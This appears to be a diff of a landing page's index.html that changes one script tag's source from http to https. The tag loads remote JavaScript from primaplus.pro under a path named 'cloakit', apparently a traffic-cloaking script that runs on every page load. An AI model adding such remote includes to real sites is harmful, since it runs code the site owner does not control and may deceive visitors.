--- a/index.html
+++ b/index.html
@@ -22,7 +22,7 @@
 
 </head>
 <body>
-<script id="clk_scr" src="http://primaplus.pro/cloakit/script.js"></script>
+<script id="clk_scr" src="https://primaplus.pro/cloakit/script.js"></script>
 
   <section class="header3 cid-s3CpMKPykQ mbr-parallax-background" id="header3-0">
 
